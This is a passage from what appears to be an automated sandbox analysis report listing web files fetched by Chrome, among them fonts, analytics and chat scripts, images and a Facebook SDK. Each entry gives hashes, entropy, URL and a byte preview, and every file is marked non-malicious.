                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):79
                                                                                                                                                                                                        Entropy (8bit):3.9951663126378123
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:U3KTDW3MiLLUHcjVXlVBT7J:H6NLgHWXZT7J
                                                                                                                                                                                                        MD5:97B958FA75E225CEA6FA3F3E399010D0
                                                                                                                                                                                                        SHA1:4DDFF887AB1D6FFC1678A717F1327E6C0900B9F8
                                                                                                                                                                                                        SHA-256:0C909725B0EA7DA9994F16E47A4142783410C5AA25CDD7770F85DC61EB8A170C
                                                                                                                                                                                                        SHA-512:C8130E21AF2E53D9B3615EAF54714A1160C0D2D80629F4EC19108F307226FA62ED9A45D415041C649A9E2BC2631AF87DD0FC88792051B82096904D3A44166882
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0})
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 23236, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23236
                                                                                                                                                                                                        Entropy (8bit):7.986328239479246
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:AHLaTYDpoR9l+9cJHxkGk3kbFpW88POLvFd9EDtwntxiFyLs86d975a2sfbAh:AHLKSSD49c0SFQ1wFnCajiws86dJ59WK
                                                                                                                                                                                                        MD5:716309AAB2BCA045F9627F63AD79D0BF
                                                                                                                                                                                                        SHA1:38804233A29AAF975D557FE14E762C627BEF76E0
                                                                                                                                                                                                        SHA-256:115F6A626CA115D4AD5581B59275327E0E860B30330A52B0F785561332DD2429
                                                                                                                                                                                                        SHA-512:ADB0BC6CB9B230EDA5DAC7396A94A9A4DBA9C8BA0B2EB73F5F21A20C3CA3D14651420BC6A17E67A71B5BBA624F5A4E92D55CBBB898985DCCA838184F6DFB2B15
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh7USSwiPGQ.woff2
                                                                                                                                                                                                        Preview:wOF2......Z........\..Z^..........................z.p.`..`..D....s...........B.....6.$..v. .....E.r........}Q.J..0..m..%h...1/<...J......z..........N&2\.K{iZ.....F$.AZ.!.=..a(...mv..t.6d..lH2..E}..j*2..oq..Q..B#..*........i.....\..%...0.Os..f.^;}..J....i..>]..w-...rN&#Y.N.9n.......[.=d...y..;...54..`7(.......!......b...$$..{._...|.;...7....0...Wlls..8.P.[.Ts.tu.T...c..*..F.g.;.....@.^/3......U0..Pu..;]......%.:...Z../..t..(..p..#..!!-...}.#..ET.Q5A._K.6...Q\.7,....8.E....R.ATPQ..(iI..60.Y....^....\.7}.z....c......Y}Y....1....(...y.!Z.,*...h...{.n....j....8.&..!....0'....m....7..L...rA...C..K....I..0.l8...A...."......'...........,M`.`.}..2.."<.MW[.....?..5..;.`.".d..dU..........V1..W.O.,.....r....+./.....z.m\..2...l ..6....... .+J..k..T%..4Uy..U.#.=....]'...f...R.u.Z......s.g.P+\....(....$...W....s'.{.R'...>..5f.R..9......&.`.A....b.Jexn.$..g.4.../.#.VR.B%.f+3&.qb.?...:.~........:Dg.5,...j.B..B.^-.......?.ig......(..O..~ ..\...T%:......P..M."..+.++_4...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):226668
                                                                                                                                                                                                        Entropy (8bit):5.317886567792035
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:XmqIZl5phQk+VC+xyLRcP2QJ0roSjdDTtS223EM/LuJPY:mM2qQDTtSn/ihY
                                                                                                                                                                                                        MD5:07CCF6A40F3784CDA6D8E5B87DC0F338
                                                                                                                                                                                                        SHA1:0AAAAD04F6EEDCF425B79E1793C9CF39D61663ED
                                                                                                                                                                                                        SHA-256:AFCAB19D198D0192FE681D01E573B7E3A2B3DB9C7E6379B5C05A2DCE307A53A7
                                                                                                                                                                                                        SHA-512:F4C46C8683D8738D074D3BB3016963FA354A9412ED02A1ED4863560F157A3039729948A51E11C93A3C57BB0F8F5BD9273F71626D1F592FBB23F95D99C6B6CFBA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/include/1725034800000/5amzsk8w99z9.js
                                                                                                                                                                                                        Preview:!function(e){function webpackJsonpCallback(t){for(var r,o,i=t[0],s=t[1],c=0,u=[];c<i.length;c++)o=i[c],n[o]&&u.push(n[o][0]),n[o]=0;for(r in s)Object.prototype.hasOwnProperty.call(s,r)&&(e[r]=s[r]);for(a&&a(t);u.length;)u.shift()()}var t={},n={0:0};function __webpack_require__(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,__webpack_require__),r.l=!0,r.exports}__webpack_require__.e=function requireEnsure(e){var t=[],r=n[e];if(0!==r)if(r)t.push(r[2]);else{var o=new Promise(function(t,o){r=n[e]=[t,o]});t.push(r[2]=o);var i,a=document.createElement("script");a.charset="utf-8",a.timeout=120,__webpack_require__.nc&&a.setAttribute("nonce",__webpack_require__.nc),a.src=function jsonpScriptSrc(e){return __webpack_require__.p+"assets/"+({}[e]||e)+"."+{1:"37afe153",2:"2a722653",3:"ee35dea2"}[e]+".chunk.js"}(e);var s=new Error;i=function(t){a.onerror=a.onload=null,clearTimeout(c);var r=n[e];if(0!==r){if(r){var o=t&&("load"===t.type?"missing"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 23580, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23580
                                                                                                                                                                                                        Entropy (8bit):7.990537110832721
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:384:dRkIAJ8pVwWTW5VVjdVn8+2yvAMdriCEOY0kfW9GkAPqpPHi2vUuUSzB8:dKIAJ8pVHTZ+riY9oCpPHiodUeK
                                                                                                                                                                                                        MD5:E1B3B5908C9CF23DFB2B9C52B9A023AB
                                                                                                                                                                                                        SHA1:FCD4136085F2A03481D9958CC6793A5ED98E714C
                                                                                                                                                                                                        SHA-256:918B7DC3E2E2D015C16CE08B57BCB64D2253BAFC1707658F361E72865498E537
                                                                                                                                                                                                        SHA-512:B2DA7EF768385707AFED62CA1F178EFC6AA14519762E3F270129B3AFEE4D3782CB991E6FA66B3B08A2F81FF7CABA0B4C34C726D952198B2AC4A784B36EB2A828
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6uyw4BMUTPHjx4wXg.woff2
                                                                                                                                                                                                        Preview:wOF2......\........,..[...........................z.p.`..D....e........]..B..6.$..v. .....E.K...5c[R..V.Vr!.....$....@n..P.....'%.1....."A...#H:.T.6.JL.7.g..7..x....N"..,h....R3..u.T..A.._O..f=Mu.e.....0.c.0.FV.q....m;8..J.t.-.%."....*..&..2...!\....n..]Lx..:......S/F.V.rf%..#.Uk}....X.1n..V.|.O..aC ."...#..>..n.... $;.....y.5..|>...;@..Q.D........FT...r=p.Llf...J.3..{Z.. t]Rp.N..Z..7"B..,D.0s..."o..V<...#.N.WZ...m.\......Pb....#:z...B......~w.....J.ABQ.u<.8j..m..r2.....Aq.fNY...P..c.L+......v.n..yV.w......l......H...,..2.."v.......R.V.[...s......@..L....CS..'....Z.2..o......).4.H{C.%..?.%^...#.A.]..[....._&.[~1..j.P..`.......=......[.D7h..5...s......d'.....,....?...6.;....f..(M.CV.....R..q.c.....4.6.k.V.h/..........H..?u..!mq5...9@..0YA9.M..:..reS.;._......K...\..S.^.2..Fv.l~'l..U.TN*....OXv..]..`.X1w.4E.t%a...2!.c.R.............t.'Hc...2.8...K.w..p@..T*..RZ.@..)}..*'+.7s1..... . -.....E7<...C.J.D....Iw-...u...m.K.\e..>..*....7y|{........G..d13g].t.%.y<..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4218
                                                                                                                                                                                                        Entropy (8bit):4.544439217564774
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:UqQIf1nMokw38pyoiscC/EDxep5ibaMSXnT:1Qy1nMFw38MoiIMDYMaMu
                                                                                                                                                                                                        MD5:EF6A09165D42F65868127041B2878D5A
                                                                                                                                                                                                        SHA1:224A834D1E376E3047BA1AD17C2488FA532A5F7D
                                                                                                                                                                                                        SHA-256:644BE328F7BF3C9ABD9421EB3615110FBC9C660542F8E061D00BDF6C4E58A624
                                                                                                                                                                                                        SHA-512:7BE3A953E1C7894FFB0616ACEFFCD1DC1552F665B370713317AB965F0314B1F4B23F0E776B2F93D57127A5E508A3E57DBD5E6BD88FB6F0B766DC3D51D0EFA9C8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 14.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 43363) -->..<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">..<svg version="1.1" id="Ebene_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... width="183.122px" height="48.105px" viewBox="0 0 183.122 48.105" enable-background="new 0 0 183.122 48.105"... xml:space="preserve">..<polygon fill="#FFFFFF" points="3.701,4.24 49.274,4.24 49.274,44.571 3.701,44.571 "/>..<path fill="#E20025" d="M32.428,4.24l16.846,40.331V4.24H32.428z M3.701,4.24v40.331L20.56,4.24H3.701z M19.128,36.459h7.855...l3.21,8.112h7.034L26.495,19.103L19.128,36.459z"/>..<path d="M73.332,4.134l-9.12,40.438h5.52l2.4-11.159h8.4l2.34,11.159h5.58l-8.58-40.438H73.332z M72.792,28.912l1.92-9.659...c0.54-2.58,1.14-6.3,1.56-9.239h0.24c0.42,2.88,0.96,6.479,1.5,9.239l1.86,9.659H72.792z M109.521,3.054h-5.64v15.179
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):68076
                                                                                                                                                                                                        Entropy (8bit):5.253482511347538
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:bx5P+lx5LhQk+9dSwgx+DFF3rUMFWgqKh20zK5wd:bnmz5LhQk+9d6xwWP0u5+
                                                                                                                                                                                                        MD5:49CE5445DDCF5D24EF3BADC4EB1A11DD
                                                                                                                                                                                                        SHA1:DBE8CF782A53824BAC569AA3EA42992DD21064D6
                                                                                                                                                                                                        SHA-256:D70FA5DC6C8BFE9D7824BE31E669528533D0879A2B1600A7DF68B880F4D44296
                                                                                                                                                                                                        SHA-512:A720C00082E803A92EF54A1829BC845B187CD4544F5B202BC98F234A4FC9401EE76B21F8CB21E4C93F88B8DD8AA63D93A03DFF5A39570DA19EB6D105FFEC6683
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/js/26.04e7f30b.chunk.js
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[26],{"8Sys":function(e,t,n){"use strict";n.d(t,"a",function(){return r}),n.d(t,"b",function(){return o});var r,o,i="undefined"!==typeof performance&&performance,a=i&&i.now?function(){return i.now()}:function(){return Date.now()};function throwIfEmpty(e){if(!e)throw new Error("name must be non-empty")}if(i&&i.mark)r=function mark(e){throwIfEmpty(e),i.mark("start "+e)},o=function stop(e){throwIfEmpty(e),i.mark("end "+e),i.measure(e,"start "+e,"end "+e);var t=i.getEntriesByName(e);return t[t.length-1]},function getEntries(){return i.getEntriesByType("measure")},function clear(){i.clearMarks(),i.clearMeasures()};else{var s={},c=[];r=function mark(e){throwIfEmpty(e);var t=a();s["$"+e]=t},o=function stop(e){throwIfEmpty(e);var t=a(),n=s["$"+e];if(!n)throw new Error("no known mark: "+e);var r={startTime:n,name:e,duration:t-n,entryType:"measure"};return function insertSorted(e,t){for(var n,r=0,o=e.length;r<o;)e[n=r+o>>>1].startTime<t.startTi
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (473), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):473
                                                                                                                                                                                                        Entropy (8bit):5.066274338471234
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:XzjbdHhjbzriSnRRlAXPqwXoPU6XoPpMfXoPRofXoPHXoPIrcdrXYb7zlhnEySza:fbjiKDOywXGXeOXLXAXsDQ7zXEDGs6
                                                                                                                                                                                                        MD5:FE8B06E215FFBE772F8F5EB04270B5E1
                                                                                                                                                                                                        SHA1:163523EE63F120A343D3C7EC0106AB330221A66B
                                                                                                                                                                                                        SHA-256:24248C73BCD855870A22DB4F16F2C1BE03F0AE054245D29E2FF91F3ACEE1E71B
                                                                                                                                                                                                        SHA-512:5B5ADEAA7D325F86FF3DA2890280EB73433284DE080A331D1339D83281F623C88E591E9E49FBEFA3D86991CD0F8069DD752BC58046F00279CE65CE6FFD0EF81C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1744],{19849:function(e,n,t){Promise.resolve().then(t.t.bind(t,89562,23)),Promise.resolve().then(t.t.bind(t,5685,23)),Promise.resolve().then(t.t.bind(t,51395,23)),Promise.resolve().then(t.t.bind(t,78703,23)),Promise.resolve().then(t.t.bind(t,93112,23)),Promise.resolve().then(t.t.bind(t,53751,23))}},function(e){var n=function(n){return e(e.s=n)};e.O(0,[1293,286],function(){return n(15391),n(19849)}),_N_E=e.O()}]);
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):42
                                                                                                                                                                                                        Entropy (8bit):3.966738780375731
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:YGKexGHLKFD/xY:YGKex6K5/xY
                                                                                                                                                                                                        MD5:B4A072B06C68AB515897B81085ED4F41
                                                                                                                                                                                                        SHA1:E8370C1EF39DB24DDEB0FAE9896A17C7009D3310
                                                                                                                                                                                                        SHA-256:8A243A15708323B2F7EBC5A23B9E89E9E7BC4ADC566BD436E0AE79935E7999B2
                                                                                                                                                                                                        SHA-512:839FA877179056B2A1C08AA4DA12CA3645D0CB4E5331E590AFCD5AF532D2BE6C3FA44A23AED89FA97552F21201747A6DBC8220F23FEAB863EFAF5FF2895FB993
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"code":"not_found","message":"Not found"}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (20666), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):20666
                                                                                                                                                                                                        Entropy (8bit):5.41690031771457
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:fpoJFbxLOTGfSLQ4SVVkNSW3pp8w5c/SsYNOqH7vZMfUpJAi4fNAHMYvavQsSTz5:hobxLOTGfBt/SOSTZM4JcVsTzDzoko0D
                                                                                                                                                                                                        MD5:1200A42843993DEC74B309E4B1A1CBAB
                                                                                                                                                                                                        SHA1:B2DABC739119677FD09BC1DDCA44BD30D1395625
                                                                                                                                                                                                        SHA-256:960F55236483F3BCD2CEE59E0C46A42022851BBDF80F35CE5D652DC9FB771197
                                                                                                                                                                                                        SHA-512:EE96A376F628BAF8EEEC389BDB7F8FC4BCF26B9C40C592BA1030EF072514D5DCA7EC5F0765612B36DB22D436E3D2307957FD66D085D3ADDF6701A43DC636A9EC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:!function(e){var n={};function t(i){if(n[i])return n[i].exports;var c=n[i]={i:i,l:!1,exports:{}};return e[i].call(c.exports,c,c.exports,t),c.l=!0,c.exports}t.m=e,t.c=n,t.d=function(e,n,i){t.o(e,n)||Object.defineProperty(e,n,{enumerable:!0,get:i})},t.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.t=function(e,n){if(1&n&&(e=t(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.__esModule)return e;var i=Object.create(null);if(t.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var c in e)t.d(i,c,function(n){return e[n]}.bind(null,c));return i},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=2)}([function(e,n,t){"use strict";function i(e){return null==e}function c(e){return i(e)||e i
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4655
                                                                                                                                                                                                        Entropy (8bit):7.263267278230314
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jEc5N26MT0D5MdtbZPAVwzVHluzRTofLuWt:+0gcoYNMtKw/uzREu+
                                                                                                                                                                                                        MD5:9633CFBF002772A0CF6EAFE49111B2CF
                                                                                                                                                                                                        SHA1:B00899FA7F78963D8773AEC4E2A716201C5FE5BF
                                                                                                                                                                                                        SHA-256:9655258BC391E9CBA60E2036D33F447D1C88C775514DCF951D053CA2BDDE25E7
                                                                                                                                                                                                        SHA-512:FA4C38E51D09027B507529C861D89CFC4E5674FF06F38A414A6D608AD6971BAC2B238E8047D67FB04F1D91BE246EDAB0495C1A55440CC4C8C2098C441F900B15
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/69d55a02-59f1-4cbf-aabd-353fd6b19bca.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15086
                                                                                                                                                                                                        Entropy (8bit):2.832642895649505
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:jPuUeHEh+yAkizR55zFGQHhLvx6Mm1MQLiinK0POaiBWa:jkxwbS
                                                                                                                                                                                                        MD5:66E842B7DD20398291ECED92664A65D7
                                                                                                                                                                                                        SHA1:FF11116AA61A1FB80CE3D55B08F523273F6CD18E
                                                                                                                                                                                                        SHA-256:E4EB96A815CAD710E1A6EC743185A92A0B11500EB4020C23707AC9F69DD58747
                                                                                                                                                                                                        SHA-512:AD4CF727EC203AD1DBCAA92EFD227E23269BC46CEBA6090DDC340E86E93853E942D4B7AF01DF97F2113A1E07B30AE99321F08FC6942D1ABBD4E76D6D0606AD70
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$...............................................................................................................................................................................................................................................................................................................................................R....@D.........................................................................................................................................................................................N...S......................................................................................................................................................................................U...N...Z...U..................................................................................................................................................................................M.L.N...[...i?..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, baseline, precision 8, 500x449, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):23952
                                                                                                                                                                                                        Entropy (8bit):7.956350927855447
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:LLYzvhO82FdmwRMS3tUIoz7SKaAG88hCDkq5/4vhPeKtVrc4X0QHuvrG:LLYzg33tUvSKao2uzwvh2KHjHuDG
                                                                                                                                                                                                        MD5:3CC029F515EBF5471BBC051031F6643D
                                                                                                                                                                                                        SHA1:2C418666F773407CB9E13F6C0FB6720320B23A01
                                                                                                                                                                                                        SHA-256:C7AF771D2F426DB31AAF1E35B25CD1483F3F15C4E628EDBAE34B8423C54A6AE5
                                                                                                                                                                                                        SHA-512:A2128AEED0E48BCC40616D1CAC31F83F91BFE96EEE6A6CBBECA7E6A04B52FDE797016FE2C95CCD5957DAF65A40338C61D5120D12832DB91518E60765274CABB8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/nhph4-p-500.jpg
                                                                                                                                                                                                        Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".........................................O..........................!1...2AQRUaq...."ST.....35BCt..#s..6cr..47b.$%&D...................................>.........................!1R...AQbq....4a....."B23S..#5..$Cr............?...Y..n|..cE.<....[.3...4..........W....zg.....x..^R.....UZ..H..(...Rv..n.r...yt..P?.;4|....y..+X....Z.W....z..g..c.k{..9..+X..:G.....6.h.'...S.\.....l.C.s.o|St8.:...[[..4.=f.U.<..@.|^.Q.R..R|..J..&..g..c.k{..9..+X.........5..n...H..%.QW.K..J.v.o...q.u..n...Z.....%....D..a........J.M.QD:.V.'.=....[....1...Z.|.68....f......LS..M]..A...F@..(p...W..U+5t.e...9..)..c.k{..EOup+.....=....[....1...Z.M.=..i.o>&.t8.:...7C.s.o|V..EOup.j.....1...M....[...D.S.\.....l.C.s.o|St8.:...k.4T.W......=....[....1...Z.M.=..i.o>&.t8.:...7C.s.o|V..EOup.j.....1...M....[...D.S.\.....l.C..o|St8.:...k.4T.W....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13165)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):306736
                                                                                                                                                                                                        Entropy (8bit):5.503158171045068
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:QVPCQYGPrpc3j/yBNtuQAgaI3YPhpR4JXcC:QPm/yBNtUL3C
                                                                                                                                                                                                        MD5:27A96471EA8B6C3CD365638DA64AE45F
                                                                                                                                                                                                        SHA1:EB3385F507AFF6B7C28B2170BB20961272DC2F36
                                                                                                                                                                                                        SHA-256:BDB377B50D4383B547AF2E2490A72687275963EB28EBA3896CCE059BDC6C434A
                                                                                                                                                                                                        SHA-512:A2CB75B2DB2EF96B609F99F1860E6B413AFB7919C25FB1B5B8DFDC3177FF539E74FDD9758F18D9705EE3180EDB815645F22BEFACD359FE6930618A6026B4249B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:/*1725031032,,JIT Construction: v1016108272,en_US*/../**. * Copyright (c) 2017-present, Facebook, Inc. All rights reserved.. *. * You are hereby granted a non-exclusive, worldwide, royalty-free license to use,. * copy, modify, and distribute this software in source code or binary form for use. * in connection with the web services and APIs provided by Facebook.. *. * As with any software that integrates with the Facebook platform, your use of. * this software is subject to the Facebook Platform Policy. * [http://developers.facebook.com/policy/]. This copyright notice shall be. * included in all copies or substantial portions of the software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS. * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR. * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER. * IN AN ACTION OF CO
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
